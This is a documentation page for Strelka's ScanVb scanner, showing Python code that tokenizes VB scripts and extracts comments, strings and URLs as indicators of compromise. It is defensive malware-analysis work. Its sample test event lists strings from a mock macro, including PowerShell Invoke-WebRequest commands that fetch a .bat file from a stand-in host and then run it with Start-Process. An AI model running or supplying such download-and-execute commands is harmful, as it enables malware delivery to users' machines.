ScanVb
Scanner for Visual Basic (VB) script files.
This scanner parses VB script files to extract various components like comments,
function names, strings, and URLs. It leverages the Pygments lexer for VB.NET to
tokenize the script data and then extracts useful information from these tokens.
Attributes:
| Name |
Type |
Description |
lexer |
|
A Pygments lexer object for tokenizing VB.NET scripts.
|
url_regex |
|
A compiled regex pattern for extracting URLs from the script.
|
Source code in strelka/src/python/strelka/scanners/scan_vb.py
| class ScanVb(strelka.Scanner):
"""
Scanner for Visual Basic (VB) script files.
This scanner parses VB script files to extract various components like comments,
function names, strings, and URLs. It leverages the Pygments lexer for VB.NET to
tokenize the script data and then extracts useful information from these tokens.
Attributes:
lexer: A Pygments lexer object for tokenizing VB.NET scripts.
url_regex: A compiled regex pattern for extracting URLs from the script.
"""
def init(self):
# Initialize the lexer for VB.NET language using Pygments
self.lexer = lexers.get_lexer_by_name("vbnet")
# Regular expression to capture URLs, considering various schemes and TLDs.
self.url_regex = re.compile(
r'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|beauty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchannel|cool|coop|corsica|country|coupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|futbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|health|healthcare|help|helsinki|here|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|scholarships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr|srl|srt|st|stada|staples|star|starhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))',
re.IGNORECASE,
)
def scan(self, data, file, options, expire_at):
"""
Scans the VB script file, tokenizes it, and extracts useful components.
Args:
data: Content of the file being scanned.
file: File metadata.
options: Scanner options.
expire_at: Expiry timestamp of the scan task.
"""
# Tokenize the script data using the Pygments lexer
try:
# Tokenize the script data using the Pygments lexer
highlight = pygments.highlight(
data, self.lexer, formatters.RawTokenFormatter()
)
except Exception as e:
self.flags.append(f"highlighting_error: {str(e)[:50]}")
return
try:
highlight_list = highlight.split(b"\n")
except Exception as e:
self.flags.append(f"highlight_split_error: {str(e)[:50]}")
return
# Initialize containers for script components
ordered_highlights = []
for hl in highlight_list:
try:
split_highlight = hl.split(b"\t")
if len(split_highlight) == 2:
token, value = split_highlight
token = token.decode()
value = value.decode().strip("'\"").strip()
# Add non-empty values to the ordered highlights
if value:
ordered_highlights.append({"token": token, "value": value})
except Exception as e:
self.flags.append(f"token_parsing_error: {str(e)[:50]}")
# Initialize event fields to store extracted data
self.event.setdefault("tokens", [])
self.event.setdefault("comments", [])
self.event.setdefault("functions", [])
self.event.setdefault("names", [])
self.event.setdefault("operators", [])
self.event.setdefault("strings", [])
self.event.setdefault("urls", [])
# Get script length
self.event["script_length_bytes"] = len(data)
# Process and categorize each token
try:
for ohlp in ordered_highlights:
self.categorize_token(ohlp)
except Exception as e:
self.flags.append(f"token_categorization_error: {str(e)[:50]}")
# Remove duplicates and add URLs as IOCs
try:
if self.event["urls"]:
self.event["urls"] = list(set(self.event["urls"]))
self.add_iocs(self.event["urls"])
except Exception as e:
self.flags.append(f"ioc_extraction_error: {str(e)[:50]}")
def categorize_token(self, ohlp):
"""
Categorizes a token and extracts relevant information.
Args:
ohlp: A dictionary containing a token and its value.
"""
token, value = ohlp["token"], ohlp["value"]
if token not in self.event["tokens"]:
self.event["tokens"].append(token)
if token == "Token.Comment":
if value not in self.event["comments"]:
self.event["comments"].append(value)
self.extract_urls(value)
elif token == "Token.Name.Function":
if value not in self.event["functions"]:
self.event["functions"].append(value)
elif token == "Token.Name":
if value not in self.event["names"]:
self.event["names"].append(value)
elif token == "Token.Operator":
if value not in self.event["operators"]:
self.event["operators"].append(value)
elif token == "Token.Literal.String":
if value not in self.event["strings"]:
self.event["strings"].append(value)
self.extract_urls(value)
def extract_urls(self, text):
"""
Extracts URLs from the provided text using regex matching.
Args:
text: Text content from which URLs are to be extracted.
"""
try:
urls = self.url_regex.findall(text)
for url in urls:
if url not in self.event["urls"]:
self.event["urls"].append(url)
except Exception as e:
self.flags.append(f"url_extraction_error: {str(e)[:50]}")
|
scan(data, file, options, expire_at)
Scans the VB script file, tokenizes it, and extracts useful components.
Parameters:
| Name |
Type |
Description |
Default |
data |
|
Content of the file being scanned.
|
required
|
file |
|
|
required
|
options |
|
|
required
|
expire_at |
|
Expiry timestamp of the scan task.
|
required
|
Source code in strelka/src/python/strelka/scanners/scan_vb.py
| def scan(self, data, file, options, expire_at):
"""
Scans the VB script file, tokenizes it, and extracts useful components.
Args:
data: Content of the file being scanned.
file: File metadata.
options: Scanner options.
expire_at: Expiry timestamp of the scan task.
"""
# Tokenize the script data using the Pygments lexer
try:
# Tokenize the script data using the Pygments lexer
highlight = pygments.highlight(
data, self.lexer, formatters.RawTokenFormatter()
)
except Exception as e:
self.flags.append(f"highlighting_error: {str(e)[:50]}")
return
try:
highlight_list = highlight.split(b"\n")
except Exception as e:
self.flags.append(f"highlight_split_error: {str(e)[:50]}")
return
# Initialize containers for script components
ordered_highlights = []
for hl in highlight_list:
try:
split_highlight = hl.split(b"\t")
if len(split_highlight) == 2:
token, value = split_highlight
token = token.decode()
value = value.decode().strip("'\"").strip()
# Add non-empty values to the ordered highlights
if value:
ordered_highlights.append({"token": token, "value": value})
except Exception as e:
self.flags.append(f"token_parsing_error: {str(e)[:50]}")
# Initialize event fields to store extracted data
self.event.setdefault("tokens", [])
self.event.setdefault("comments", [])
self.event.setdefault("functions", [])
self.event.setdefault("names", [])
self.event.setdefault("operators", [])
self.event.setdefault("strings", [])
self.event.setdefault("urls", [])
# Get script length
self.event["script_length_bytes"] = len(data)
# Process and categorize each token
try:
for ohlp in ordered_highlights:
self.categorize_token(ohlp)
except Exception as e:
self.flags.append(f"token_categorization_error: {str(e)[:50]}")
# Remove duplicates and add URLs as IOCs
try:
if self.event["urls"]:
self.event["urls"] = list(set(self.event["urls"]))
self.add_iocs(self.event["urls"])
except Exception as e:
self.flags.append(f"ioc_extraction_error: {str(e)[:50]}")
|
categorize_token(ohlp)
Categorizes a token and extracts relevant information.
Parameters:
| Name |
Type |
Description |
Default |
ohlp |
|
A dictionary containing a token and its value.
|
required
|
Source code in strelka/src/python/strelka/scanners/scan_vb.py
| def categorize_token(self, ohlp):
"""
Categorizes a token and extracts relevant information.
Args:
ohlp: A dictionary containing a token and its value.
"""
token, value = ohlp["token"], ohlp["value"]
if token not in self.event["tokens"]:
self.event["tokens"].append(token)
if token == "Token.Comment":
if value not in self.event["comments"]:
self.event["comments"].append(value)
self.extract_urls(value)
elif token == "Token.Name.Function":
if value not in self.event["functions"]:
self.event["functions"].append(value)
elif token == "Token.Name":
if value not in self.event["names"]:
self.event["names"].append(value)
elif token == "Token.Operator":
if value not in self.event["operators"]:
self.event["operators"].append(value)
elif token == "Token.Literal.String":
if value not in self.event["strings"]:
self.event["strings"].append(value)
self.extract_urls(value)
|
Extracts URLs from the provided text using regex matching.
Parameters:
| Name |
Type |
Description |
Default |
text |
|
Text content from which URLs are to be extracted.
|
required
|
Source code in strelka/src/python/strelka/scanners/scan_vb.py
| def extract_urls(self, text):
"""
Extracts URLs from the provided text using regex matching.
Args:
text: Text content from which URLs are to be extracted.
"""
try:
urls = self.url_regex.findall(text)
for url in urls:
if url not in self.event["urls"]:
self.event["urls"].append(url)
except Exception as e:
self.flags.append(f"url_extraction_error: {str(e)[:50]}")
|
Features
The features of this scanner are detailed below. These features represent the capabilities and the type of analysis the scanner can perform. This may include support for Indicators of Compromise (IOC), the ability to emit files for further analysis, and the presence of extended documentation for complex analysis techniques.
| Feature |
Support |
IOC Support |
|
Emit Files |
|
Extended Docs |
|
Malware Scanner |
|
Image Thumbnails |
|
Tastes
Strelka's file distribution system assigns scanners to files based on 'flavors' and 'tastes'. Flavors describe the type of file, typically determined by MIME types from libmagic, matches from YARA rules, or characteristics of parent files. Tastes are the criteria used within Strelka to determine which scanners are applied to which files, with positive and negative tastes defining files to be included or excluded respectively.
| Source Filetype |
Include / Exclude |
hta_file |
|
vb_file |
|
vbscript |
|
Scanner Fields
This section provides a list of fields that are extracted from the files processed by this scanner. These fields include the data elements that the scanner extracts from each file, representing the analytical results produced by the scanner. If the test file is missing or cannot be parsed, this section will not contain any data.
| Field Name |
Field Type |
comments |
list
|
elapsed |
str
|
flags |
list
|
functions |
list
|
iocs |
str
|
names |
list
|
operators |
list
|
script_length_bytes |
int
|
strings |
list
|
tokens |
list
|
urls |
str
|
Sample Event
Below is a sample event generated by this scanner, demonstrating the kind of output that can be expected when it processes a file. This sample is derived from a mock scan event configured in the scanner's test file. If no test file is available, this section will not display a sample event.
test_scan_event = {
"elapsed": 0.001,
"flags": [],
"comments": ["AutoOpen Macro"],
"functions": ["AutoOpen", "Document_Open", "Testing_Iocs"],
"names": [
"Explicit",
"MsgBox",
"objWMIService",
"GetObject",
"objStartup",
"Get",
"objConfig",
"SpawnInstance_",
"ShowWindow",
"objProcess",
"ExecuteCmdAsync",
],
"operators": ["="],
"strings": [
"Hello World!",
"winmgmts:\\\\\\\\.\\\\root\\\\cimv2",
"Win32_ProcessStartup",
"winmgmts:\\\\\\\\.\\\\root\\\\cimv2:Win32_Process",
"cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\\\\test.txt\\nStart-Process -Filepath $env:tmp\\\\invoice.one",
"cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\\\\test.bat\\nStart-Process -Filepath $env:tmp\\\\test.bat",
],
"script_length_bytes": 752,
"tokens": [
"Token.Keyword",
"Token.Name",
"Token.Text.Whitespace",
"Token.Name.Function",
"Token.Punctuation",
"Token.Comment",
"Token.Literal.String",
"Token.Operator",
"Token.Literal.Number.Integer",
],
"urls": unordered(
[
"tmp\\\\invoice.one",
"https://www.test.com/test.bat",
"https://www.test.example.com",
]
),
"iocs": unordered(
[
{
"ioc": "www.test.example.com",
"ioc_type": "domain",
"scanner": "ScanVb",
},
{
"ioc": "https://www.test.example.com",
"ioc_type": "url",
"scanner": "ScanVb",
},
{"ioc": "www.test.com", "ioc_type": "domain", "scanner": "ScanVb"},
{
"ioc": "https://www.test.com/test.bat",
"ioc_type": "url",
"scanner": "ScanVb",
},
]
),
}